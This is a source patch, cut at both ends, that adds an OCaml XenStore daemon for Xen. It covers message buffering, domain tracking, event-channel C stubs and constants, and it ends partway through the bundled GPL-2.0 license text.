+ Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +class buffer length = +object (self) + val m_buffer = String.make length Constants.null_char + val mutable m_position = 0 + method private position = m_position + method buffer = String.copy m_buffer + method clear = + String.blit (String.make self#length Constants.null_char) 0 m_buffer 0 self#length; + m_position <- 0 + method length = String.length m_buffer + method remaining = self#length - self#position + method write data = + let length = (String.length data) in + String.blit data 0 m_buffer m_position length; + m_position <- m_position + length +end + +class buffered_message = +object (self) + val m_header = new buffer Message.header_size + val mutable m_payload = new buffer 0 + method allocate_payload length = m_payload <- new buffer length + method clear = + self#header#clear; + self#allocate_payload 0 + method header = m_header + method in_header = self#header#remaining <> 0 + method in_payload = self#payload#remaining <> 0 + method message = + if self#in_header + then Message.null_message + else ( + let header = Message.deserialise_header self#header#buffer in + let payload = if self#payload#length = 0 then String.make header.Message.length Constants.null_char else self#payload#buffer in + 
Message.make header.Message.message_type header.Message.transaction_id header.Message.request_id payload + ) + method payload = m_payload +end + +class connection (interface : Interface.interface) = +object (self) + val m_input_buffer = new buffered_message + val m_interface = interface + method private interface = m_interface + method private input_buffer = m_input_buffer + method private read_buffer buffer = + let read_buffer = String.make buffer#remaining Constants.null_char in + let bytes = self#interface#read read_buffer 0 (String.length read_buffer) in + if bytes < 0 + then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read_buffer", "Error reading from interface")) + else (buffer#write (String.sub read_buffer 0 bytes); buffer#remaining = 0) + method private write_buffer buffer offset = + let length = String.length buffer in + let bytes_written = self#interface#write buffer offset (length - offset) in + if offset + bytes_written < length then self#write_buffer buffer (offset + bytes_written) + method can_read = self#interface#can_read + method can_write = self#interface#can_write + method destroy = self#interface#destroy + method read = + let input = self#input_buffer in + if input#in_header && self#read_buffer input#header + then ( + let length = input#message.Message.header.Message.length in + if length > Constants.payload_max + then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read", "Payload too big")) + else input#allocate_payload length + ); + if (not input#in_header && not input#in_payload) || (input#in_payload && self#read_buffer input#payload) + then ( + let message = input#message in + input#clear; + Some (message) + ) + else None + method write message = self#write_buffer ((Message.serialise_header message.Message.header) ^ message.Message.payload) 0 +end diff -r 10a8fae412c5 tools/xenstore/constants.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/constants.ml Thu Jan 15 15:44:05 2009 -0800 
@@ -0,0 +1,82 @@ +(* + Constants for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let path_max = 4096 +let absolute_path_max = 3072 +let relative_path_max = 2048 +let payload_max = 4096 + +(* domain_id_self is used in certain contexts to refer to oneself *) +let domain_id_self = 0x7FF0 + +(* The prefix character that indicates a watch event *) +let event_char = '@' + +let null_char = char_of_int 0 +let null_string = String.make 0 null_char +let null_file_descr = - 1 + +let payload_false = "F" +let payload_true = "T" + +let virq_dom_exc = 3 + +(* Error type *) +type error = + | EINVAL + | EACCES + | EEXIST + | EISDIR + | ENOENT + | ENOMEM + | ENOSPC + | EIO + | ENOTEMPTY + | ENOSYS + | EROFS + | EBUSY + | EAGAIN + | EISCONN + (* XXX: Hack to fix violation of errors specified in protocol *) + | E2BIG + | EPERM + +(* Return the string representation of an error *) +let error_message error = + match error with + | EINVAL -> "EINVAL" + | EACCES -> "EACCES" + | EEXIST -> "EEXIST" + | EISDIR -> "EISDIR" + | ENOENT -> "ENOENT" + | ENOMEM -> "ENOMEM" + | ENOSPC -> "ENOSPC" + | EIO -> "EIO" + | ENOTEMPTY -> "ENOTEMPTY" + | ENOSYS -> "ENOSYS" + | EROFS -> "EROFS" + | EBUSY -> "EBUSY" + | EAGAIN -> "EAGAIN" + | EISCONN -> "EISCONN" + (* XXX: 
Hack to fix violation of errors specified in protocol *) + | E2BIG -> "E2BIG" + | EPERM -> "EPERM" + +(* Error exception *) +exception Xs_error of error * string * string diff -r 10a8fae412c5 tools/xenstore/domain.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/domain.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,105 @@ +(* + Domains for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let xc_handle = Eventchan.xc_interface_open () + +class domain (id : int) (connection : Connection.connection) = +object (self) + val m_id = id + val m_connection = connection + val mutable m_input_list = [] + val mutable m_output_list = [] + val mutable m_dying = false + val mutable m_shutdown = false + method private connection = m_connection + method private input_list = m_input_list + method private output_list = m_output_list + method add_input_message message = m_input_list <- m_input_list @ [ message ] + method add_output_message message = m_output_list <- m_output_list @ [ message ] + method can_read = self#connection#can_read + method can_write = self#has_output_message && self#connection#can_write + method destroy = self#connection#destroy + method dying = m_dying <- true + method has_input_message = List.length 
self#input_list > 0 + method has_output_message = List.length self#output_list > 0 + method id = m_id + method input_message = + let message = List.hd self#input_list in + m_input_list <- List.tl m_input_list; + message + method input_messages = self#input_list + method is_dying = m_dying + method is_shutdown = m_shutdown + method output_message = + let message = List.hd self#output_list in + m_output_list <- List.tl m_output_list; + message + method output_messages = self#output_list + method read = match self#connection#read with Some (message) -> self#add_input_message message | None -> () + method shutdown = m_shutdown <- true + method write = self#connection#write self#output_message +end + +class domains = +object (self) + val m_dominfo = Dominfo.init () + val m_entries = Hashtbl.create 8 + val mutable m_domains : domain list = [] + method private check domain = + if Dominfo.info self#dominfo xc_handle domain#id = 1 && Dominfo.domid self#dominfo = domain#id + then ( + if (Dominfo.crashed self#dominfo || Dominfo.shutdown self#dominfo) && not domain#is_shutdown then domain#shutdown; + if Dominfo.dying self#dominfo then domain#dying + ); + domain#is_dying || domain#is_shutdown + method private dominfo = m_dominfo + method private entries = m_entries + method add domain = + m_domains <- domain :: m_domains; + Hashtbl.add self#entries domain#id 0 + method cleanup = List.fold_left (fun domains domain -> if self#check domain then domain :: domains else domains) [] self#domains + method domains = m_domains + method entry_count domain_id = Hashtbl.find self#entries domain_id + method entry_decr domain_id = + let entries = try pred (Hashtbl.find self#entries domain_id) with Not_found -> 0 in + Hashtbl.replace self#entries domain_id (if entries < 0 then 0 else entries) + method entry_incr domain_id = Hashtbl.replace self#entries domain_id (try succ (Hashtbl.find self#entries domain_id) with Not_found -> 1) + method find_by_id domain_id = List.find (fun domain -> 
domain#id = domain_id) self#domains + method remove (domain : domain) = + m_domains <- List.filter (fun dom -> domain#id <> dom#id) self#domains; + Hashtbl.remove self#entries domain#id; + domain#destroy + method timeout = if List.exists (fun domain -> domain#can_read || domain#can_write) self#domains then 0.0 else - 1.0 +end + +(* Initialise an unprivileged domain *) +let domu_init id remote_port mfn notify = + let port = Eventchan.bind_interdomain id remote_port in + let interface = new Xenbus.xenbus_interface port (Xenbus.map_foreign xc_handle id mfn) in + let connection = new Connection.connection interface in + if notify then Eventchan.notify port; + new domain id connection + +(* Check if a domain is unprivileged based on its ID *) +let is_unprivileged_id domain_id = + domain_id > 0 + +(* Check if a domain is unprivileged *) +let is_unprivileged domain = + is_unprivileged_id domain#id diff -r 10a8fae412c5 tools/xenstore/dominfo.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/dominfo.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,47 @@ +(* + Domain info for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type t;; + +external get_crashed32 : t -> int32 = "get_crashed_c";; +external get_domid32 : t -> int32 = "get_domid_c";; +external get_dying32 : t -> int32 = "get_dying_c";; +external get_shutdown32 : t -> int32 = "get_shutdown_c";; +external init : unit -> t = "init_dominfo_c";; +external xc_domain_getinfo : int -> int -> int -> t -> int = "xc_domain_getinfo_c";; + +(* Return crashed state *) +let crashed dominfo = + get_crashed32 dominfo <> 0l + +(* Return domain ID *) +let domid dominfo = + Int32.to_int (get_domid32 dominfo) + +(* Return dying state *) +let dying dominfo = + get_dying32 dominfo <> 0l + +(* Return domain info *) +let info dominfo xc_handle id = + xc_domain_getinfo xc_handle id 1 dominfo + +(* Return shutdown state *) +let shutdown dominfo = + get_shutdown32 dominfo <> 0l diff -r 10a8fae412c5 tools/xenstore/dominfo_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/dominfo_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,93 @@ +/* + Domain info C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include + +#include +#include + +#include +#include +#include +#include + +/* Initialise a domain's info */ +value init_dominfo_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + + value dominfo_v = alloc (Abstract_tag, 1); + Field (dominfo_v, 0) = (value) malloc (sizeof(xc_dominfo_t)); + + CAMLreturn (dominfo_v); +} + +/* Return a domain's info */ +value xc_domain_getinfo_c (value fd_v, value domid_v, value max_doms_v, value dominfo_v) +{ + CAMLparam4 (fd_v, domid_v, max_doms_v, dominfo_v); + + int fd = Int_val (fd_v); + uint32_t domid = (uint32_t)(Int_val (domid_v)); + unsigned int max_doms = Int_val (max_doms_v); + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (Val_int (xc_domain_getinfo(fd, domid, max_doms, dominfo))); +} + +/* Return a domain's crashed state */ +value get_crashed_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->crashed)); +} + +/* Return a domain's ID */ +value get_domid_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->domid)); +} + +/* Return a domain's dying state */ +value get_dying_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->dying)); +} + +/* Return a domain's shutdown state */ +value get_shutdown_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->shutdown)); +} diff -r 10a8fae412c5 tools/xenstore/eventchan.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ 
b/tools/xenstore/eventchan.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,68 @@ +(* + Event channel for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +external fake_call : unit -> int = "xc_interface_open" +external xc_event_chan_bind_interdomain : int -> int -> int -> int = "xc_evtchn_bind_interdomain_c" +external xc_event_chan_bind_virq : int -> int -> int = "xc_evtchn_bind_virq_c" +external xc_event_chan_fd : int -> int = "xc_evtchn_fd_c" +external xc_event_chan_open : unit -> int = "xc_evtchn_open_c" +external xc_event_chan_notify : int -> int -> int = "xc_evtchn_notify_c" +external xc_event_chan_pending : int -> int = "xc_evtchn_pending_c" +external xc_event_chan_unbind : int -> int -> int = "xc_evtchn_unbind_c" +external xc_event_chan_unmask : int -> int -> int = "xc_evtchn_unmask_c" +external xc_interface_open : unit -> int = "xc_interface_open_c" +external xc_interface_close : int -> int = "xc_interface_close_c" + +(* XXX: Force libxenctrl to be compiled in. 
There must be a better way *) +let fake () = + fake_call () + +let xce_handle = ref (- 1) + +(* Bind a domain to the remote end *) +let bind_interdomain id remote_port = + xc_event_chan_bind_interdomain !xce_handle id remote_port + +(* Bind the virq *) +let bind_virq virq = + xc_event_chan_bind_virq !xce_handle virq + +(* Return the event channel fd *) +let get_channel () = + xc_event_chan_fd !xce_handle + +(* Initialise the event channel *) +let init () = + xce_handle := xc_event_chan_open () + +(* Notify XenBus *) +let notify port = + ignore (xc_event_chan_notify !xce_handle port) + +(* Check for pending event *) +let pending () = + xc_event_chan_pending !xce_handle + +(* Unbind a XenBus port *) +let unbind port = + xc_event_chan_unbind !xce_handle port <> - 1 + +(* Unmask a XenBus port *) +let unmask port = + xc_event_chan_unmask !xce_handle port diff -r 10a8fae412c5 tools/xenstore/eventchan_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/eventchan_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,124 @@ +/* + Event channel C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details.
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include + +#include +#include +#include + + +/* Bind an interdomain event channel */ +value xc_evtchn_bind_interdomain_c (value xce_handle_v, value domid_v, value remote_port_v) +{ + CAMLparam3 (xce_handle_v, domid_v, remote_port_v); + + int xce_handle = Int_val (xce_handle_v); + int domid = Int_val (domid_v); + uint32_t remote_port = (uint32_t)(Int_val (remote_port_v)); + + CAMLreturn (Val_int (xc_evtchn_bind_interdomain (xce_handle, domid, remote_port))); +} + +/* Bind the VIRQ event channel */ +value xc_evtchn_bind_virq_c (value xce_handle_v, value virq_v) +{ + CAMLparam2 (xce_handle_v, virq_v); + + int xce_handle = Int_val (xce_handle_v); + unsigned int virq = Int_val (virq_v); + + CAMLreturn (Val_int (xc_evtchn_bind_virq (xce_handle, virq))); +} + +/* Return the event channel file descriptor */ +value xc_evtchn_fd_c (value xce_handle_v) +{ + CAMLparam1 (xce_handle_v); + + int xce_handle = Int_val (xce_handle_v); + + CAMLreturn (Val_int (xc_evtchn_fd (xce_handle))); +} + +/* Notify an event channel of an event */ +value xc_evtchn_notify_c (value xce_handle_v, value port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_notify (xce_handle, port))); +} + +/* Open the event channel */ +value xc_evtchn_open_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + CAMLreturn (Val_int (xc_evtchn_open ())); +} + +/* Check an event channel for pending events */ +value xc_evtchn_pending_c (value xce_handle_v) +{ + CAMLparam1 (xce_handle_v); + + int xce_handle = Int_val (xce_handle_v); + + CAMLreturn (Val_int (xc_evtchn_pending (xce_handle))); +} + +/* Unbind an event channel */ +value xc_evtchn_unbind_c (value xce_handle_v, value 
port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_unbind (xce_handle, port))); +} + +/* Unmask an event channel */ +value xc_evtchn_unmask_c (value xce_handle_v, value port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_unmask (xce_handle, port))); +} + +/* Close the XenBus interface */ +value xc_interface_close_c (value xc_handle_v) +{ + CAMLparam1 (xc_handle_v); + CAMLreturn (Val_int (xc_interface_close (Int_val (xc_handle_v)))); +} + +/* Open the XenBus interface */ +value xc_interface_open_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + CAMLreturn (Val_int (xc_interface_open ())); +} diff -r 10a8fae412c5 tools/xenstore/gpl-2.0.txt --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/gpl-2.0.txt Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. 
Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. 
+ + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. 
You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. 
+ +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for 